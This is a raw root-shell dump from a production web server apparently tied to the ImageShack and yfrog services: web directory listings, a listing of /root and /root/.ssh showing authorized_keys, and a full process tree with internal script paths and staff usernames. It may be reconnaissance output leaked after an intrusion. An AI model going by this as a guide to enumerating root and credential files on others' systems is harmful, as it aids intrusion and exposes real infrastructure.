-rwxr-xr-x 1 image image 49 Feb 22 2011 reg_domain.php
-rwxr-xr-x 1 image image 645 May 28 2010 NEW_Text-Based_Ad_Units.php
-rwxr-xr-x 1 image image 3003 May 28 2010 advertising_original.php
-rwxr-xr-x 1 image image 492 May 28 2010 checker.php
-rwxr-xr-x 1 image image 1106 May 28 2010 developerpublic.php
-rwxr-xr-x 1 image image 4081 May 28 2010 email2.php
-rwxr-xr-x 1 image image 6957 May 28 2010 faq1.php
-rwxr-xr-x 1 image image 1903 May 28 2010 faq2.php
-rwxr-xr-x 1 image image 4417 May 28 2010 faq3.php
-rwxr-xr-x 1 image image 5402 May 28 2010 faq4.php
-rwxr-xr-x 1 image image 3423 May 28 2010 faq5.php
-rwxr-xr-x 1 image image 739 May 28 2010 faq6.php
-rwxr-xr-x 1 image image 2007 May 28 2010 faq7.php
-rwxr-xr-x 1 image image 6168 May 28 2010 old_rules.php
drwxr-xr-x 3 image image 4096 Apr 9 2010 en
drwxr-xr-x 2 image image 4096 Apr 9 2010 nick
-rwxr-xr-x 1 image image 1349 Jan 11 2010 quickshot.php
-rwxr-xr-x 1 image image 3340 Aug 17 2009 winuploader.php
-rwxr-xr-x 1 image image 28989 Aug 5 2009 2draganddropupload0xq.png
-rwxr-xr-x 1 image image 158 Aug 5 2009 625tango.php
-rwxr-xr-x 1 image image 83068 Aug 5 2009 Demographics.PNG
-rwxr-xr-x 1 image image 19040 Aug 5 2009 SpryMenuBar.js
-rwxr-xr-x 1 image image 5608 Aug 5 2009 SpryMenuBarHorizontal.css
-rwxr-xr-x 1 image image 5608 Aug 5 2009 SpryMenuBarHorizontal_bak.css
-rwxr-xr-x 1 image image 637 Aug 5 2009 TextBasedAds
-rwxr-xr-x 1 image image 57 Aug 5 2009 aptimus.php
-rwxr-xr-x 1 image image 11723 Aug 5 2009 aptreg.php
-rwxr-xr-x 1 image image 2609 Aug 5 2009 blog.php
-rwxr-xr-x 1 image image 49 Aug 5 2009 ceili.php
-rwxr-xr-x 1 image image 975 Aug 5 2009 change.php
-rwxr-xr-x 1 image image 312 Aug 5 2009 chat.php
-rwxr-xr-x 1 image image 11 Aug 5 2009 chris.php
-rwxr-xr-x 1 image image 17 Aug 5 2009 crap.php
-rwxr-xr-x 1 image image 7993 Aug 5 2009 developer.php.save
-rwxr-xr-x 1 image image 4256 Aug 5 2009 diagnose.php.save
-rwxr-xr-x 1 image image 6 Aug 5 2009 dirtyshack.php
-rwxr-xr-x 1 image image 4040 Aug 5 2009 done.old.php
-rwxr-xr-x 1 image image 1065 Aug 5 2009 drag_drop_to_sites.php
-rwxr-xr-x 1 image image 3923 Aug 5 2009 email.php.O
-rwxr-xr-x 1 image image 3226 Aug 5 2009 email.php.bak
-rwxr-xr-x 1 image image 3715 Aug 5 2009 email.php.bak2
-rwxr-xr-x 1 image image 3869 Aug 5 2009 email.php.save
-rwxr-xr-x 1 image image 58 Aug 5 2009 emailtoolbar.php
-rwxr-xr-x 1 image image 20 Aug 5 2009 empty.php
-rwxr-xr-x 1 image image 0 Aug 5 2009 evil_guys1
-rwxr-xr-x 1 image image 287 Aug 5 2009 evilporn.php
-rwxr-xr-x 1 image image 84 Aug 5 2009 example.php
-rwxr-xr-x 1 image image 6507 Aug 5 2009 faq1.file
-rwxr-xr-x 1 image image 1662 Aug 5 2009 faq2.file
-rwxr-xr-x 1 image image 3655 Aug 5 2009 faq3.file
-rwxr-xr-x 1 image image 3961 Aug 5 2009 faq4.file
-rwxr-xr-x 1 image image 3427 Aug 5 2009 faq5.file
-rwxr-xr-x 1 image image 745 Aug 5 2009 faq6.file
-rwxr-xr-x 1 image image 1242 Aug 5 2009 features.file.save
-rwxr-xr-x 1 image image 2650 Aug 5 2009 find.php
-rwxr-xr-x 1 image image 2350 Aug 5 2009 fotoblog.php
-rwxr-xr-x 1 image image 0 Aug 5 2009 install.log
-rwxr-xr-x 1 image image 4639 Aug 5 2009 jobs.back
-rwxr-xr-x 1 image image 358 Aug 5 2009 kalleboo.php
-rwxr-xr-x 1 image image 4693 Aug 5 2009 login.php
-rwxr-xr-x 1 image image 6712 Aug 5 2009 logo_help.jpg
-rwxr-xr-x 1 image image 1923 Aug 5 2009 lorem.php
-rwxr-xr-x 1 image image 840 Aug 5 2009 macuploader.php
-rwxr-xr-x 1 image image 804 Aug 5 2009 macuploader2.php
-rwxr-xr-x 1 image image 807 Aug 5 2009 meebo.php
-rwxr-xr-x 1 image image 705 Aug 5 2009 mostvideo.file
-rwxr-xr-x 1 image image 830 Aug 5 2009 mostviewed.file
-rwxr-xr-x 1 image image 4140 Aug 5 2009 myimages.php
-rwxr-xr-x 1 image image 44 Aug 5 2009 neil.php
-rwxr-xr-x 1 image image 2307 Aug 5 2009 photoblog.php
-rwxr-xr-x 1 image image 1760 Aug 5 2009 photoblog1.php
-rwxr-xr-x 1 image image 1601 Aug 5 2009 photoblog2.php
-rwxr-xr-x 1 image image 2176 Aug 5 2009 phototest.php
-rwxr-xr-x 1 image image 2175 Aug 5 2009 phototest.phpu
-rwxr-xr-x 1 image image 41 Aug 5 2009 phpdev2.php
-rwxr-xr-x 1 image image 2605 Aug 5 2009 postblog2.php
-rwxr-xr-x 1 image image 0 Aug 5 2009 postimageforum.file
-rwxr-xr-x 1 image image 486 Aug 5 2009 posting.file
-rwxr-xr-x 1 image image 260 Aug 5 2009 profiles.file
-rwxr-xr-x 1 image image 2357 Aug 5 2009 quickload.php
-rwxr-xr-x 1 image image 18343 Aug 5 2009 quickshot152.png
-rwxr-xr-x 1 image image 18343 Aug 5 2009 quickshot1520uu.png.1
-rwxr-xr-x 1 image image 3900 Aug 5 2009 reggy.php
-rwxr-xr-x 1 image image 3844 Aug 5 2009 register.old
-rwxr-xr-x 1 image image 3783 Aug 5 2009 register.php
-rwxr-xr-x 1 image image 3900 Aug 5 2009 register.php.aptimus.backup
-rwxr-xr-x 1 image image 3901 Aug 5 2009 register.php.bak
-rwxr-xr-x 1 image image 2 Aug 5 2009 register2.php
-rwxr-xr-x 1 image image 3546 Aug 5 2009 register_dev.php
-rwxr-xr-x 1 image image 883476 Aug 5 2009 reports.backup
-rwxr-xr-x 1 image image 442 Aug 5 2009 rsgiant.php
-rwxr-xr-x 1 image image 7670 Aug 5 2009 rules.old
-rwxr-xr-x 1 image image 6288 Aug 5 2009 rules.phpu
-rwxr-xr-x 1 image image 596 Aug 5 2009 sendfilehelp.php
-rwxr-xr-x 1 image image 586 Aug 5 2009 signin.php
-rwxr-xr-x 1 image image 390 Aug 5 2009 spam.php
-rwxr-xr-x 1 image image 3823 Aug 5 2009 suggest.php
-rwxr-xr-x 1 image image 9924063 Aug 5 2009 tobedeleted.backup
-rwxr-xr-x 1 image image 1733 Aug 5 2009 tobedeleted.php
-rwxr-xr-x 1 image image 74 Aug 5 2009 todelete.php
-rwxr-xr-x 1 image image 232 Aug 5 2009 toolbar.file
-rwxr-xr-x 1 image image 7436 Aug 5 2009 toolbarmenu1ji.png
-rwxr-xr-x 1 image image 2736 Aug 5 2009 toolbarnecros.php
-rwxr-xr-x 1 image image 2674 Aug 5 2009 toolbarnecros2.php
-rwxr-xr-x 1 image image 741 Aug 5 2009 torrent_viaurl.php
-rwxr-xr-x 1 image image 52748 Aug 5 2009 torrentdeletes.backup
-rwxr-xr-x 1 image image 244 Aug 5 2009 torrents.file
-rwxr-xr-x 1 image image 3938 Aug 5 2009 transloader.php
-rwxr-xr-x 1 image image 3725 Aug 5 2009 tut_videos.php
-rwxr-xr-x 1 image image 2372 Aug 5 2009 tut_videos.php_bak
-rwxr-xr-x 1 image image 180 Aug 5 2009 tutorialads.php
-rwxr-xr-x 1 image image 71 Aug 5 2009 tutorials.file
-rwxr-xr-x 1 image image 4644 Aug 5 2009 tutorials.php
-rwxr-xr-x 1 image image 4660 Aug 5 2009 tutorials_.php
-rwxr-xr-x 1 image image 0 Aug 5 2009 uploadflashfrontpage.file
-rwxr-xr-x 1 image image 0 Aug 5 2009 uploadimagemyimages.file
-rwxr-xr-x 1 image image 476 Aug 5 2009 uploading.file
-rwxr-xr-x 1 image image 0 Aug 5 2009 uploading.php
-rwxr-xr-x 1 image image 0 Aug 5 2009 uploadmultifrontpage.file
-rwxr-xr-x 1 image image 17 Aug 5 2009 uploadvideomyvideos
-rwxr-xr-x 1 image image 1 Aug 5 2009 uploadvideomyvideos.file
-rwxr-xr-x 1 image image 18 Aug 5 2009 vadim.php
-rwxr-xr-x 1 image image 2028 Aug 5 2009 video.php
# ls -alt /root
total 2348
-rw-r--r-- 1 root root 33 Aug 28 19:35 kernel_md5
-rw------- 1 root root 20643 Aug 13 20:34 .bash_history
drwxr-x--- 4 root root 4096 Aug 7 12:24 .
lrwxrwxrwx 1 root root 51 Aug 7 12:24 check.api.latency.sh -> /home/i
mage/svn/ops/tools/root/check.api.latency.sh
lrwxrwxrwx 1 root root 51 Jun 5 14:24 autokill.runaways.sh -> /home/i
mage/svn/ops/tools/root/autokill.runaways.sh
lrwxrwxrwx 1 root root 45 Feb 16 2012 iostat.data.sh -> /home/image/s
vn/ops/tools/root/iostat.data.sh
lrwxrwxrwx 1 root root 47 Feb 16 2012 iostat.gather.sh -> /home/image
/svn/ops/tools/root/iostat.gather.sh
lrwxrwxrwx 1 root root 49 Dec 8 2011 clean.misc.logs.sh -> /home/ima
ge/svn/ops/tools/root/clean.misc.logs.sh
-rw-r--r-- 1 root root 2301483 Dec 3 2011 reg_run.yfrog
drwxr-xr-x 25 root root 4096 Nov 13 2011 ..
lrwxrwxrwx 1 root root 46 Oct 6 2011 run.cfengine.sh -> /home/image/
svn/ops/tools/root/run.cfengine.sh
-rw------- 1 root root 47 Aug 29 2011 .lesshst
lrwxrwxrwx 1 root root 30 Mar 2 2011 .nanorc -> /home/image/svn/conf
ig/.nanorc
drwxr-xr-x 2 root root 4096 Aug 15 2009 ifs
drwxr-xr-x 2 root root 4096 Aug 13 2009 .ssh
-rw------- 1 root root 2186 Aug 13 2009 anaconda-ks.cfg
-rw-r--r-- 1 root root 21358 Aug 13 2009 install.log
-rw-r--r-- 1 root root 0 Aug 13 2009 install.log.syslog
-rw-r--r-- 1 root root 24 Jul 12 2006 .bash_logout
-rw-r--r-- 1 root root 191 Jul 12 2006 .bash_profile
-rw-r--r-- 1 root root 176 Jul 12 2006 .bashrc
-rw-r--r-- 1 root root 100 Jul 12 2006 .cshrc
-rw-r--r-- 1 root root 129 Jul 12 2006 .tcshrc
# ls -alt /root/.ssh
total 12
drwxr-x--- 4 root root 4096 Aug 7 12:24 ..
drwxr-xr-x 2 root root 4096 Aug 13 2009 .
-rw-r--r-- 1 root root 605 Aug 13 2009 authorized_keys
# ps auxwwf
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2 0.0 0.0 0 0 ? S< 2011 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 2011 91:31 \_ [migrat
ion/0]
root 4 0.0 0.0 0 0 ? S< 2011 9:30 \_ [ksofti
rqd/0]
root 5 0.0 0.0 0 0 ? S< 2011 0:00 \_ [watchd
og/0]
root 6 0.0 0.0 0 0 ? S< 2011 82:55 \_ [migrat
ion/1]
root 7 0.0 0.0 0 0 ? S< 2011 8:19 \_ [ksofti
rqd/1]
root 8 0.0 0.0 0 0 ? S< 2011 0:00 \_ [watchd
og/1]
root 9 0.0 0.0 0 0 ? S< 2011 96:38 \_ [migrat
ion/2]
root 10 0.0 0.0 0 0 ? S< 2011 6:26 \_ [ksofti
rqd/2]
root 11 0.0 0.0 0 0 ? S< 2011 0:00 \_ [watchd
og/2]
root 12 0.0 0.0 0 0 ? S< 2011 128:32 \_ [migrat
ion/3]
root 13 0.0 0.0 0 0 ? S< 2011 2:03 \_ [ksofti
rqd/3]
root 14 0.0 0.0 0 0 ? S< 2011 0:00 \_ [watchd
og/3]
root 15 0.0 0.0 0 0 ? S< 2011 9:50 \_ [events
/0]
root 16 0.0 0.0 0 0 ? S< 2011 46:38 \_ [events
/1]
root 17 0.0 0.0 0 0 ? S< 2011 3:16 \_ [events
/2]
root 18 0.0 0.0 0 0 ? S< 2011 280:39 \_ [events
/3]
root 19 0.0 0.0 0 0 ? S< 2011 0:00 \_ [khelpe
r]
root 90 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kinteg
rityd/0]
root 91 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kinteg
rityd/1]
root 92 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kinteg
rityd/2]
root 93 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kinteg
rityd/3]
root 95 0.0 0.0 0 0 ? S< 2011 0:11 \_ [kblock
d/0]
root 96 0.0 0.0 0 0 ? S< 2011 0:09 \_ [kblock
d/1]
root 97 0.0 0.0 0 0 ? S< 2011 0:38 \_ [kblock
d/2]
root 98 0.0 0.0 0 0 ? S< 2011 0:13 \_ [kblock
d/3]
root 100 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kacpid
]
root 101 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kacpi_
notify]
root 184 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue
]
root 188 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/0]
root 189 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/1]
root 190 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/2]
root 191 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/3]
root 192 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata_au
x]
root 194 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ksuspe
nd_usbd]
root 199 0.0 0.0 0 0 ? S< 2011 0:00 \_ [khubd]
root 202 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kserio
d]
root 272 0.0 0.0 0 0 ? S< 2011 11:22 \_ [kswapd
0]
root 319 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/0]
root 320 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/1]
root 321 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/2]
root 322 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/3]
root 509 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_e
h_0]
root 512 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_e
h_1]
root 535 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_e
h_2]
root 538 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_e
h_3]
root 607 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kpsmou
sed]
root 614 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kstrip
ed]
root 617 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ksnapd
]
root 660 0.0 0.0 0 0 ? S< 2011 222:56 \_ [kjourn
ald]
root 1409 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kaudit
d]
root 1439 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpath
d/0]
root 1440 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpath
d/1]
root 1441 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpath
d/2]
root 1442 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpath
d/3]
root 1443 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpath
_handlerd]
root 1467 0.0 0.0 0 0 ? S< 2011 108:33 \_ [kjourn
ald]
root 1490 0.0 0.0 0 0 ? S< 2011 40:38 \_ [kjourn
ald2]
root 1646 0.0 0.0 0 0 ? S< 2011 493:07 \_ [kondem
and/0]
root 1647 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kondem
and/1]
root 1648 0.1 0.0 0 0 ? S< 2011 655:45 \_ [kondem
and/2]
root 1649 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kondem
and/3]
root 23470 0.0 0.0 0 0 ? S Aug26 0:28 \_ [pdflus
h]
root 19623 0.0 0.0 0 0 ? S Aug26 0:15 \_ [pdflus
h]
root 1 0.0 0.0 4084 968 ? Ss 2011 0:10 /sbin/init
root 705 0.0 0.0 10448 796 ? S<s 2011 0:00 /sbin/udevd
-d
root 1860 0.0 0.0 182920 1572 ? Sl 2011 5:06 rsyslogd -c
3
root 1872 0.0 0.0 6880 528 ? Ss 2011 53:15 irqbalance
dbus 1903 0.0 0.0 19140 876 ? Ss 2011 0:00 dbus-daemon
--system
root 1928 0.0 0.0 3932 612 ? Ss 2011 0:00 /usr/sbin/a
cpid
root 1941 0.0 0.0 165984 6508 ? S 2011 88:39 /usr/sbin/s
nmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid -a
root 1957 0.0 0.0 58664 1240 ? Ss 2011 0:01 /usr/sbin/s
shd
root 1991 0.0 0.0 66772 2368 ? Ss 2011 10:49 sendmail: a
ccepting connections
smmsp 1999 0.0 0.0 58376 1812 ? Ss 2011 0:03 sendmail: Q
ueue runner@01:00:00 for /var/spool/clientmqueue
root 2034 0.0 0.0 16572 460 ? Ss 2011 0:00 /usr/sbin/a
td
root 2170 0.0 0.0 3920 552 tty4 Ss+ 2011 0:00 /sbin/minge
tty tty4
root 2171 0.0 0.0 3920 552 tty5 Ss+ 2011 0:00 /sbin/minge
tty tty5
root 2172 0.0 0.0 3920 552 tty2 Ss+ 2011 0:00 /sbin/minge
tty tty2
root 2173 0.0 0.0 3920 552 tty3 Ss+ 2011 0:00 /sbin/minge
tty tty3
root 2175 0.0 0.0 3920 552 tty6 Ss+ 2011 0:00 /sbin/minge
tty tty6
npettas 24915 0.0 0.0 87716 1312 ? Ss 2011 0:00 bash -c tai
l -f /var/log/httpd/nginx-yfrog2.log | grep ' 500 '
npettas 24931 0.0 0.0 86944 704 ? S 2011 6:08 \_ tail -f
/var/log/httpd/nginx-yfrog2.log
npettas 24932 0.0 0.0 85000 848 ? S 2011 0:00 \_ grep 5
00
npettas 29693 0.0 0.0 86944 708 ? Ss 2011 6:07 tail -f /va
r/log/httpd/nginx-yfrog2.log
npettas 18932 0.0 0.0 86944 700 ? Ss 2011 5:56 tail -f /va
r/log/httpd/nginx-yfrog2.log
npettas 10814 0.0 0.0 86940 684 ? Ss 2011 5:38 tail -f /va
r/log/httpd/yfrog2.tadpole.log
cwhite 16709 0.0 0.0 87716 1312 ? Ss 2011 0:00 bash -c tai
l -f /var/log/httpd/php_error.log | grep NICK
cwhite 16725 0.0 0.0 86944 708 ? S 2011 4:54 \_ tail -f
/var/log/httpd/php_error.log
cwhite 16726 0.0 0.0 84996 836 ? S 2011 0:01 \_ grep NI
CK
cwhite 3089 0.0 0.0 87716 1312 ? Ss 2011 0:00 bash -c tai
l -f /var/log/httpd/php_error.log | grep NICK
cwhite 3105 0.0 0.0 86944 708 ? S 2011 4:53 \_ tail -f
/var/log/httpd/php_error.log
cwhite 3106 0.0 0.0 84996 836 ? S 2011 0:01 \_ grep NI
CK
gmond 11264 0.5 0.1 283292 12032 ? Ssl 2011 2203:39 /usr/sbin/
gmond
root 11266 0.0 0.0 86944 800 ? S 2011 25:05 \_ tail -F
--pid=11264 /var/log/httpd/nginx-yfrog2.log
root 11267 0.0 0.0 86944 796 ? S 2011 52:41 \_ tail -F
--pid=11264 /var/log/httpd/nginx-yfrog.log
named 19165 4.5 0.6 222272 54252 ? Ssl 2011 18156:31 /usr/sbin
/named -u named
root 10914 0.0 0.0 3920 548 tty1 Ss+ 2011 0:00 /sbin/minge
tty tty1
root 22825 0.0 0.1 196992 13968 ? S Feb24 16:44 /usr/local/
bin/php /data/imageshack/packages/dropbox-sync/bin/DropboxSync.php
root 11369 0.1 0.0 89952 1616 ? S May24 143:46 /bin/sh /us
r/local/sbin/edgar.sh --background
root 23720 0.0 0.0 86920 672 ? S 19:56 0:00 \_ sleep 1
0
root 9935 0.0 0.0 47028 4876 ? Ss May31 0:00 nginx: mast
er process /usr/local/bin/nginx-yfrog -c /etc/nginx-yfrog/nginx.conf
apache 29263 0.6 0.0 47820 5904 ? S Jul27 287:19 \_ nginx:
worker process
apache 29265 0.6 0.0 47828 5888 ? S Jul27 287:37 \_ nginx:
worker process
apache 29266 0.6 0.0 47564 5640 ? S Jul27 288:16 \_ nginx:
worker process
apache 29267 0.6 0.0 47524 5508 ? S Jul27 287:28 \_ nginx:
worker process
apache 29270 0.6 0.0 47880 5972 ? S Jul27 287:17 \_ nginx:
worker process
apache 450 0.6 0.0 47828 5892 ? S Aug14 129:56 \_ nginx:
worker process
apache 4740 0.6 0.0 47820 5784 ? S Aug21 62:32 \_ nginx:
worker process
apache 30148 0.6 0.0 47924 5964 ? S Aug22 56:27 \_ nginx:
worker process
image 24011 0.1 0.0 155236 5616 ? S Jun12 184:54 python /usr
/local/sbin/rolesd
root 24851 0.0 0.0 96288 1216 ? Ss Aug07 0:51 crond
root 23728 0.0 0.0 123452 1648 ? S 19:57 0:00 \_ CROND
root 23729 0.0 0.0 8948 1184 ? Ss 19:57 0:00 | \_ /bi
n/sh /root/iostat.data.sh
root 24179 0.0 0.0 8948 1276 ? S 19:57 0:00 | \_
/bin/sh /root/iostat.gather.sh sda util
root 23731 0.0 0.0 123452 1648 ? S 19:57 0:00 \_ CROND
root 23734 0.0 0.0 8948 1136 ? Ss 19:57 0:00 | \_ /bi
n/sh -c /usr/local/bin/php -q /data/imageshack/packages/yfrog-web-prod/stati
c/public/services/send_2_hbase.php >>/dev/null
root 23739 1.0 0.1 106276 8268 ? S 19:57 0:00 | \_
/usr/local/bin/php -q /data/imageshack/packages/yfrog-web-prod/static/publi
c/services/send_2_hbase.php
root 23772 0.0 0.0 123452 1648 ? S 19:57 0:00 \_ CROND
root 23780 0.0 0.0 8948 1192 ? Ss 19:57 0:00 \_ /bi
n/bash /home/image/svn/ops/tools/sbin/upload_haproxy.sh
root 23787 0.0 0.0 8180 596 ? S 19:57 0:00 \_
sleep 4
root 2094 0.2 0.0 296700 3952 ? Ss Aug15 48:56 /usr/local/
fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19661 0.6 0.2 314436 21000 ? R 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19663 0.6 0.2 303280 17624 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19666 0.6 0.2 303304 19296 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19706 0.5 0.2 314836 20912 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19726 0.6 0.2 314936 18676 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19733 0.7 0.2 314056 21536 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19766 0.8 0.2 314100 20392 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19768 0.6 0.2 303232 18328 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19802 0.6 0.2 314608 21256 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19836 0.8 0.2 314864 21816 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 19837 0.7 0.2 303300 16744 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21176 0.8 0.2 303312 17220 ? S 19:54 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21177 0.6 0.2 314572 21172 ? S 19:54 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21248 0.7 0.2 301304 17484 ? S 19:54 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21249 0.5 0.2 302436 16800 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21250 0.5 0.1 302916 15960 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21282 0.7 0.2 303232 16460 ? S 19:54 0:01 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21283 0.6 0.2 302780 18100 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21315 0.5 0.2 314728 18404 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21316 0.6 0.2 314020 19856 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21317 0.7 0.2 302548 17888 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21349 0.5 0.2 314284 20368 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21350 0.5 0.2 302524 16528 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21351 0.6 0.2 314848 20340 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 21353 0.7 0.2 314840 19404 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22400 0.8 0.2 303264 17988 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22437 0.5 0.2 313960 18236 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22439 0.6 0.2 314408 19920 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22440 0.5 0.1 303264 15576 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22472 0.8 0.2 314832 20004 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22660 0.6 0.2 315100 20020 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22693 0.4 0.1 303220 14288 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22725 0.4 0.1 303232 14444 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23514 0.8 0.2 303232 17112 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23547 0.4 0.1 303220 14840 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23548 0.5 0.2 314524 18444 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23549 0.3 0.1 302664 16284 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23550 0.4 0.1 302720 15060 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23582 0.6 0.1 314052 16132 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23583 0.4 0.1 302464 13124 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23616 1.1 0.2 314040 18004 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23617 0.7 0.1 303224 15420 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23619 0.3 0.1 303196 13624 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23656 0.4 0.1 302896 14116 ? S 19:56 0:00 \_ /usr/lo
